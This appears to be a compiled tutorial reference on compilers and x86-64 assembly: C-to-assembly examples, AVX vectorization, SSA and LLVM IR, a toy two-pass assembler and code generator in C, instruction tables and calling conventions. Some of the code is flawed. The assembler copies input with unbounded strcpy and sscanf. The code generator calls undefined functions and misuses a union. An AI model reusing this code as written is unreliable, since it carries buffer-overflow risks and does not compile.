; constant_time_sbox.asm - S-box lookup without cache timing leaks
; Table lookups indexed by secret bytes can leak through the data cache.
; Alternatives that avoid secret-dependent addresses:
;   - bit-sliced implementation: compute the S-box with Boolean
;     expressions (constant-time but complex)
;   - vector permutations (PSHUFB) on small in-register tables
;   - AES-NI instructions (preferred when available)
; Example: AES-NI
; XMM0 = state, XMM1 = round key
bit_sliced_sbox:
; AESENC performs a full round (ShiftRows, SubBytes, MixColumns,
; AddRoundKey) in hardware, without table lookups
aesenc xmm0, xmm1
ret
Source Code (C/C++)
↓
Lexical Analysis (tokenization)
↓
Parsing (AST construction)
↓
Semantic Analysis
↓
Intermediate Representation (IR)
↓
Optimization
↓
Code Generation
↓
Assembly
↓
Object Code
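To make the first stage of this pipeline concrete, here is a minimal tokenizer sketch in C. It only distinguishes identifiers, decimal numbers, and single-character punctuation; the names `token_t` and `next_token` are hypothetical, and a real C lexer also handles keywords, multi-character operators, literals, and comments.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

typedef enum { TOK_IDENT, TOK_NUMBER, TOK_PUNCT, TOK_END } token_kind_t;

typedef struct {
    token_kind_t kind;
    char text[32];   /* token spelling, truncated if longer */
} token_t;

/* Read one token starting at *src and advance *src past it. */
token_t next_token(const char **src) {
    token_t tok = { TOK_END, "" };
    const char *p = *src;
    size_t len = 0;

    while (isspace((unsigned char)*p)) p++;            /* skip whitespace */

    if (isalpha((unsigned char)*p) || *p == '_') {     /* identifier */
        tok.kind = TOK_IDENT;
        while (isalnum((unsigned char)*p) || *p == '_') {
            if (len < sizeof tok.text - 1) tok.text[len++] = *p;
            p++;
        }
    } else if (isdigit((unsigned char)*p)) {           /* decimal number */
        tok.kind = TOK_NUMBER;
        while (isdigit((unsigned char)*p)) {
            if (len < sizeof tok.text - 1) tok.text[len++] = *p;
            p++;
        }
    } else if (*p != '\0') {                           /* punctuation */
        tok.kind = TOK_PUNCT;
        tok.text[len++] = *p++;
    }
    tok.text[len] = '\0';
    *src = p;
    return tok;
}
```

Calling `next_token` repeatedly on `"return a + 42;"` produces the identifier `return`, the identifier `a`, the punctuation `+`, the number `42`, the punctuation `;`, and then `TOK_END`. The parser consumes this stream to build the AST.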
// Original C
int add(int a, int b) {
return a + b;
}
Compiler-Generated Assembly (unoptimized)
add:
push rbp
mov rbp, rsp
mov DWORD PTR [rbp-4], edi
mov DWORD PTR [rbp-8], esi
mov edx, DWORD PTR [rbp-4]
mov eax, DWORD PTR [rbp-8]
add eax, edx
pop rbp
ret
Optimized (-O2)
add:
lea eax, [rdi+rsi]
ret
// Original C
int max(int a, int b) {
if (a > b) return a;
return b;
}
Generated Assembly
max:
cmp edi, esi
mov eax, esi
cmovg eax, edi ; conditional move
ret
// Original C
int sum_array(int *arr, int n) {
int total = 0;
for (int i = 0; i < n; i++) {
total += arr[i];
}
return total;
}
Scalar Assembly (no vectorization)
sum_array:
test esi, esi
jle .L3
xor eax, eax
xor ecx, ecx
.L2:
add eax, [rdi+rcx*4]
inc rcx
cmp ecx, esi
jl .L2
ret
.L3:
xor eax, eax
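ret
With AVX Vectorization
; 256-bit integer adds require AVX2; processes 8 ints per iteration,
; then finishes the remaining n % 8 elements with a scalar loop
sum_array_avx:
    xor eax, eax
    test esi, esi
    jle .done
    vpxor xmm0, xmm0, xmm0  ; zeroes all of ymm0
    xor ecx, ecx
    mov edx, esi
    and edx, -8             ; n rounded down to a multiple of 8
    jz .tail
.vec_loop:
    vpaddd ymm0, ymm0, [rdi+rcx*4]
    add ecx, 8
    cmp ecx, edx
    jl .vec_loop
    ; Horizontal sum
    vextracti128 xmm1, ymm0, 1
    vpaddd xmm0, xmm0, xmm1
    vpsrldq xmm1, xmm0, 8
    vpaddd xmm0, xmm0, xmm1
    vpsrldq xmm1, xmm0, 4
    vpaddd xmm0, xmm0, xmm1
    vmovd eax, xmm0
    vzeroupper
.tail:
    cmp ecx, esi
    jge .done
.tail_loop:
    add eax, [rdi+rcx*4]
    inc ecx
    cmp ecx, esi
    jl .tail_loop
.done:
    ret
t1 = a + b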
t2 = t1 * c
d = t2 - e
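Three-address code like the lines above can be produced by a post-order walk of an expression tree, allocating a fresh temporary for each operator. The following C sketch illustrates the idea; the types `expr_t` and `tac_buf_t` and the function `emit_tac` are hypothetical names for this example only.

```c
#include <stdio.h>
#include <string.h>

/* Expression tree node: op == 0 marks a leaf holding a variable name. */
typedef struct expr {
    char op;                       /* '+', '-', '*', or 0 for a leaf */
    const char *name;              /* variable name (leaves only) */
    const struct expr *lhs, *rhs;  /* operands (operators only) */
} expr_t;

/* Output buffer plus the counter used to name temporaries t1, t2, ... */
typedef struct {
    char text[256];
    size_t len;
    int next_temp;
} tac_buf_t;

/* Emit three-address code for e into buf; write the name that holds
 * the value of e into result. */
void emit_tac(const expr_t *e, tac_buf_t *buf, char *result, size_t result_size) {
    if (e->op == 0) {                        /* leaf: the variable itself */
        snprintf(result, result_size, "%s", e->name);
        return;
    }
    char lhs[16], rhs[16];
    emit_tac(e->lhs, buf, lhs, sizeof lhs);  /* operands first (post-order) */
    emit_tac(e->rhs, buf, rhs, sizeof rhs);
    snprintf(result, result_size, "t%d", ++buf->next_temp);
    int n = snprintf(buf->text + buf->len, sizeof buf->text - buf->len,
                     "%s = %s %c %s\n", result, lhs, e->op, rhs);
    if (n > 0 && (size_t)n < sizeof buf->text - buf->len)
        buf->len += (size_t)n;               /* advance only if the line fit */
}
```

For the tree `((a + b) * c) - e` this emits `t1 = a + b`, `t2 = t1 * c`, `t3 = t2 - e`. A naive generator would then copy `t3` into `d`; the listing above folds that copy into the last instruction.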
a1 = 5
b1 = a1 + 3
c1 = b1 * 2
if (c1 > 10)
a2 = c1 + 1
else
a3 = c1 - 1
a4 = φ(a2, a3)
; LLVM IR for simple function
define i32 @add(i32 %a, i32 %b) {
entry:
%sum = add i32 %a, %b
ret i32 %sum
}
; With control flow
define i32 @max(i32 %a, i32 %b) {
entry:
%cmp = icmp sgt i32 %a, %b
br i1 %cmp, label %then, label %else
then:
br label %merge
else:
br label %merge
merge:
%result = phi i32 [ %a, %then ], [ %b, %else ]
ret i32 %result
}
// assembler.c - Simple two-pass assembler
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#define MAX_LINE 256
#define MAX_SYMBOLS 1024
#define MAX_CODE 65536
typedef struct {
char name[64];
uint32_t address;
int defined;
} symbol_t;
typedef struct {
const char *mnemonic; // NULL marks the end of the instruction table
uint8_t opcode;
int has_imm;
} instruction_t;
// Instruction table
instruction_t inst_table[] = {
{"nop", 0x90, 0},
{"mov", 0xB8, 1}, // mov reg, imm (simplified)
{"add", 0x01, 0},
{"sub", 0x29, 0},
{"jmp", 0xE9, 1},
{"ret", 0xC3, 0},
{"int", 0xCD, 1},
{NULL, 0, 0}
};
// Symbol table
symbol_t symbols[MAX_SYMBOLS];
int symbol_count = 0;
// Generated code
uint8_t code[MAX_CODE];
uint32_t code_ptr = 0;
// Add symbol
int add_symbol(char *name, uint32_t addr) {
for (int i = 0; i < symbol_count; i++) {
if (strcmp(symbols[i].name, name) == 0) {
symbols[i].address = addr;
symbols[i].defined = 1;
return i;
}
}
strcpy(symbols[symbol_count].name, name);
symbols[symbol_count].address = addr;
symbols[symbol_count].defined = 1;
return symbol_count++;
}
// Find symbol
int find_symbol(char *name) {
for (int i = 0; i < symbol_count; i++) {
if (strcmp(symbols[i].name, name) == 0) {
return i;
}
}
return -1;
}
// Parse instruction and return its encoded size in bytes (-1 if unknown)
int parse_instruction(char *line, uint32_t addr) {
    char mnemonic[16];
    char operand[64];
    (void)addr; // size does not depend on the address in this encoding
    // Field widths keep sscanf from overflowing the buffers
    if (sscanf(line, "%15s %63s", mnemonic, operand) < 1) return -1;
    // Find instruction
    instruction_t *inst = NULL;
    for (int i = 0; inst_table[i].mnemonic != NULL; i++) {
        if (strcmp(mnemonic, inst_table[i].mnemonic) == 0) {
            inst = &inst_table[i];
            break;
        }
    }
    if (!inst) return -1;
    // One opcode byte, plus a 32-bit immediate or displacement if present.
    // This must match what second_pass emits.
    return 1 + (inst->has_imm ? 4 : 0);
}
// First pass - collect labels
void first_pass(FILE *in) {
    char line[MAX_LINE];
    uint32_t addr = 0;
    while (fgets(line, sizeof(line), in)) {
        // Remove newline
        line[strcspn(line, "\n")] = 0;
        // Skip empty lines
        if (line[0] == '\0') continue;
        // Check for label
        if (line[strlen(line)-1] == ':') {
            line[strlen(line)-1] = 0; // Remove colon
            add_symbol(line, addr);
            continue;
        }
        // Advance the location counter so later labels get real addresses
        int size = parse_instruction(line, addr);
        if (size > 0) addr += (uint32_t)size;
    }
    rewind(in);
}
// Second pass - generate code
void second_pass(FILE *in) {
char line[MAX_LINE];
code_ptr = 0;
while (fgets(line, sizeof(line), in)) {
line[strcspn(line, "\n")] = 0;
if (line[0] == '\0') continue;
// Skip labels
if (line[strlen(line)-1] == ':') continue;
char mnemonic[16];
char operand[64];
int n = sscanf(line, "%s %s", mnemonic, operand);
// Find instruction
instruction_t *inst = NULL;
for (int i = 0; inst_table[i].mnemonic != NULL; i++) {
if (strcmp(mnemonic, inst_table[i].mnemonic) == 0) {
inst = &inst_table[i];
break;
}
}
if (!inst) continue;
// Emit opcode
code[code_ptr++] = inst->opcode;
// Emit operand
if (inst->has_imm) {
if (n > 1) {
// Check if numeric or label
char *endptr;
long val = strtol(operand, &endptr, 0);
if (*endptr == '\0') {
// Numeric constant
*(uint32_t*)(code + code_ptr) = (uint32_t)val;
} else {
// Label reference
int sym_idx = find_symbol(operand);
if (sym_idx >= 0) {
// Calculate relative address for jumps
if (inst->opcode == 0xE9) { // jmp
int32_t rel = symbols[sym_idx].address -
(code_ptr + 4);
*(int32_t*)(code + code_ptr) = rel;
} else {
*(uint32_t*)(code + code_ptr) =
symbols[sym_idx].address;
}
}
}
}
code_ptr += 4;
}
}
}
// Main assembler
int main(int argc, char **argv) {
if (argc < 2) {
printf("Usage: %s input.asm\n", argv[0]);
return 1;
}
FILE *in = fopen(argv[1], "r");
if (!in) {
perror("fopen");
return 1;
}
// Two-pass assembly
first_pass(in);
second_pass(in);
fclose(in);
// Output binary
char outname[256];
snprintf(outname, sizeof(outname), "%s.bin", argv[1]);
FILE *out = fopen(outname, "wb");
if (!out) {
perror("fopen");
return 1;
}
fwrite(code, 1, code_ptr, out);
fclose(out);
printf("Assembled %u bytes to %s\n", code_ptr, outname);
return 0;
}
// ast.h - Abstract Syntax Tree
typedef enum {
NODE_INT,
NODE_VAR,
NODE_ADD,
NODE_SUB,
NODE_MUL,
NODE_DIV,
NODE_ASSIGN,
NODE_IF,
NODE_WHILE,
NODE_RETURN,
NODE_BLOCK
} node_type_t;
typedef struct ast_node {
node_type_t type;
union {
int int_value;
char *var_name;
struct {
struct ast_node *left;
struct ast_node *right;
} binary;
struct {
struct ast_node *cond;
struct ast_node *then;
struct ast_node *els;
} if_stmt;
struct {
struct ast_node *cond;
struct ast_node *body;
} while_stmt;
struct {
struct ast_node *expr;
} return_stmt;
struct {
struct ast_node **stmts;
int count;
} block;
} data;
} ast_node_t;
// codegen.c - x86-64 code generator
#include "ast.h"
#include <stdio.h>
#include <stdlib.h>
typedef struct {
FILE *out;
int label_counter;
} codegen_t;
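// Generate new label. Each call returns a freshly allocated string, so
// several labels can be live at once (a shared static buffer would make
// label_else and label_end alias each other). The caller owns the string.
char* new_label(codegen_t *cg) {
char *buf = malloc(32);
if (!buf) {
perror("malloc");
exit(1);
}
snprintf(buf, 32, ".L%d", cg->label_counter++);
return buf;
}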
// Generate code for expression (result in EAX)
void gen_expr(codegen_t *cg, ast_node_t *node) {
switch (node->type) {
case NODE_INT:
fprintf(cg->out, " mov eax, %d\n", node->data.int_value);
break;
case NODE_VAR:
fprintf(cg->out, " mov eax, [rbp-%d]\n",
find_var(node->data.var_name) * 4);
break;
case NODE_ADD:
gen_expr(cg, node->data.binary.left);
fprintf(cg->out, " push rax\n");
gen_expr(cg, node->data.binary.right);
fprintf(cg->out, " pop rcx\n");
fprintf(cg->out, " add eax, ecx\n");
break;
case NODE_SUB:
gen_expr(cg, node->data.binary.left);
fprintf(cg->out, " push rax\n");
gen_expr(cg, node->data.binary.right);
fprintf(cg->out, " mov ecx, eax\n");
fprintf(cg->out, " pop rax\n");
fprintf(cg->out, " sub eax, ecx\n");
break;
case NODE_MUL:
gen_expr(cg, node->data.binary.left);
fprintf(cg->out, " push rax\n");
gen_expr(cg, node->data.binary.right);
fprintf(cg->out, " pop rcx\n");
fprintf(cg->out, " imul eax, ecx\n");
break;
default:
break;
}
}
// Generate code for statement
void gen_stmt(codegen_t *cg, ast_node_t *node) {
switch (node->type) {
case NODE_ASSIGN:
gen_expr(cg, node->data.binary.right);
fprintf(cg->out, " mov [rbp-%d], eax\n",
find_var(node->data.binary.left->data.var_name) * 4);
break;
case NODE_IF: {
char *label_else = new_label(cg);
char *label_end = new_label(cg);
// Generate condition
gen_expr(cg, node->data.if_stmt.cond);
fprintf(cg->out, " cmp eax, 0\n");
fprintf(cg->out, " je %s\n", label_else);
// Then part
gen_stmt(cg, node->data.if_stmt.then);
fprintf(cg->out, " jmp %s\n", label_end);
// Else part
fprintf(cg->out, "%s:\n", label_else);
if (node->data.if_stmt.els) {
gen_stmt(cg, node->data.if_stmt.els);
}
fprintf(cg->out, "%s:\n", label_end);
break;
}
case NODE_WHILE: {
char *label_start = new_label(cg);
char *label_end = new_label(cg);
fprintf(cg->out, "%s:\n", label_start);
// Generate condition
gen_expr(cg, node->data.while_stmt.cond);
fprintf(cg->out, " cmp eax, 0\n");
fprintf(cg->out, " je %s\n", label_end);
// Loop body
gen_stmt(cg, node->data.while_stmt.body);
fprintf(cg->out, " jmp %s\n", label_start);
fprintf(cg->out, "%s:\n", label_end);
break;
}
case NODE_RETURN:
gen_expr(cg, node->data.return_stmt.expr);
fprintf(cg->out, " jmp .return\n");
break;
case NODE_BLOCK:
for (int i = 0; i < node->data.block.count; i++) {
gen_stmt(cg, node->data.block.stmts[i]);
}
break;
default:
break;
}
}
// Generate function prologue
void gen_prologue(codegen_t *cg, int stack_size) {
fprintf(cg->out, " push rbp\n");
fprintf(cg->out, " mov rbp, rsp\n");
fprintf(cg->out, " sub rsp, %d\n", stack_size);
}
// Generate function epilogue
void gen_epilogue(codegen_t *cg) {
fprintf(cg->out, ".return:\n");
fprintf(cg->out, " mov rsp, rbp\n");
fprintf(cg->out, " pop rbp\n");
fprintf(cg->out, " ret\n");
}
// Generate complete function
void gen_function(codegen_t *cg, ast_node_t *func) {
// Calculate stack size for local variables
int stack_size = count_locals(func) * 4;
fprintf(cg->out, "global %s\n", func->data.var_name);
fprintf(cg->out, "%s:\n", func->data.var_name);
gen_prologue(cg, stack_size);
gen_stmt(cg, func->data.block);
gen_epilogue(cg);
fprintf(cg->out, "\n");
}
// Generate entire program
void generate_program(codegen_t *cg, ast_node_t *program) {
fprintf(cg->out, "; Generated by simple compiler\n");
fprintf(cg->out, "section .text\n\n");
for (int i = 0; i < program->data.block.count; i++) {
gen_function(cg, program->data.block.stmts[i]);
}
}
// Example usage
int main() {
codegen_t cg = {stdout, 0};
// Example AST for: int main() { return 42; }
ast_node_t *program = create_block(
create_function("main",
create_block(
create_return(
create_int(42)
)
)
)
);
generate_program(&cg, program);
return 0;
}

Data Transfer Instructions

| Instruction | Description | Example |
|---|---|---|
| MOV | Move | mov rax, rbx |
| MOVZX | Move with zero-extend | movzx eax, bl |
| MOVSX | Move with sign-extend | movsx rax, bx |
| MOVSXD | Move with sign-extend (32->64) | movsxd rax, ebx |
| XCHG | Exchange | xchg rax, rbx |
| PUSH | Push onto stack | push rax |
| POP | Pop from stack | pop rax |
| LEA | Load effective address | lea rax, [rbx+rcx*4] |

Arithmetic Instructions

| Instruction | Description | Example |
|---|---|---|
| ADD | Add | add rax, rbx |
| ADC | Add with carry | adc rax, rbx |
| SUB | Subtract | sub rax, rbx |
| SBB | Subtract with borrow | sbb rax, rbx |
| MUL | Unsigned multiply | mul rbx |
| IMUL | Signed multiply | imul rax, rbx |
| DIV | Unsigned divide | div rbx |
| IDIV | Signed divide | idiv rbx |
| INC | Increment | inc rax |
| DEC | Decrement | dec rax |
| NEG | Negate | neg rax |
| CMP | Compare | cmp rax, rbx |

Logical Instructions

| Instruction | Description | Example |
|---|---|---|
| AND | Logical AND | and rax, rbx |
| OR | Logical OR | or rax, rbx |
| XOR | Exclusive OR | xor rax, rax |
| NOT | Complement | not rax |
| TEST | Test (AND without store) | test rax, rax |

Shift and Rotate Instructions

| Instruction | Description | Example |
|---|---|---|
| SHL | Shift left | shl rax, cl |
| SHR | Shift right | shr rax, cl |
| SAL | Arithmetic shift left | sal rax, cl |
| SAR | Arithmetic shift right | sar rax, cl |
| ROL | Rotate left | rol rax, cl |
| ROR | Rotate right | ror rax, cl |
| RCL | Rotate through carry left | rcl rax, cl |
| RCR | Rotate through carry right | rcr rax, cl |

Control Flow Instructions

| Instruction | Description | Example |
|---|---|---|
| JMP | Unconditional jump | jmp label |
| JE/JZ | Jump if equal/zero | je label |
| JNE/JNZ | Jump if not equal | jne label |
| JG | Jump if greater (signed) | jg label |
| JL | Jump if less (signed) | jl label |
| JGE | Jump if greater/equal | jge label |
| JLE | Jump if less/equal | jle label |
| JA | Jump if above (unsigned) | ja label |
| JB | Jump if below (unsigned) | jb label |
| CALL | Call procedure | call func |
| RET | Return | ret |
| LOOP | Loop with RCX | loop label |

String Instructions

| Instruction | Description | Example |
|---|---|---|
| MOVS | Move string | movsb |
| CMPS | Compare string | cmpsb |
| SCAS | Scan string | scasb |
| STOS | Store string | stosb |
| LODS | Load string | lodsb |
| REP | Repeat prefix | rep movsb |

System Instructions

| Instruction | Description | Example |
|---|---|---|
| SYSCALL | Fast system call | syscall |
| SYSRET | Return from syscall | sysret |
| INT | Software interrupt | int 0x80 |
| IRET | Return from interrupt | iret |
| HLT | Halt processor | hlt |
| RDMSR | Read model-specific register | rdmsr |
| WRMSR | Write model-specific register | wrmsr |
| CPUID | Processor identification | cpuid |
| RDTSC | Read timestamp counter | rdtsc |

SSE Instructions

| Instruction | Description | Example |
|---|---|---|
| MOVAPS | Move aligned packed single | movaps xmm0, xmm1 |
| MOVUPS | Move unaligned packed single | movups xmm0, [mem] |
| ADDPS | Add packed single | addps xmm0, xmm1 |
| SUBPS | Subtract packed single | subps xmm0, xmm1 |
| MULPS | Multiply packed single | mulps xmm0, xmm1 |
| DIVPS | Divide packed single | divps xmm0, xmm1 |
| SQRTPS | Square root packed single | sqrtps xmm0, xmm1 |
| ANDPS | Bitwise AND of packed single | andps xmm0, xmm1 |
| ORPS | Bitwise OR | orps xmm0, xmm1 |
| XORPS | Bitwise XOR | xorps xmm0, xmm1 |

System V AMD64 Calling Convention (Linux, macOS)
rax: Return value, scratch
rbx: Callee-saved
rcx: Scratch (argument 4)
rdx: Scratch (argument 3, return high)
rsi: Scratch (argument 2)
rdi: Scratch (argument 1)
rbp: Callee-saved (frame pointer)
rsp: Stack pointer
r8: Scratch (argument 5)
r9: Scratch (argument 6)
r10-r11: Scratch
r12-r15: Callee-saved
xmm0-1: Return value, arguments
xmm2-7: Arguments
xmm8-15: Scratch (caller-saved)
High addresses
+-----------------+
| Caller's frame |
+-----------------+ <-- 16-byte aligned
| Return address |
+-----------------+ <-- rbp+8
| Saved rbp |
+-----------------+ <-- rbp
| Local vars |
| (alignment) |
+-----------------+ <-- rsp
Low addresses

Microsoft x64 Calling Convention (Windows)
rax: Return value, scratch
rcx: Argument 1
rdx: Argument 2
r8: Argument 3
r9: Argument 4
r10-r11: Scratch
rbx: Callee-saved
rbp: Callee-saved
rdi: Callee-saved
rsi: Callee-saved
r12-r15: Callee-saved
xmm0-3: Arguments
xmm4-5: Scratch
xmm6-15: Callee-saved
Caller must allocate 32 bytes (4×8) on stack before call:
sub rsp, 32+8 ; shadow space + alignment
call func
add rsp, 32+8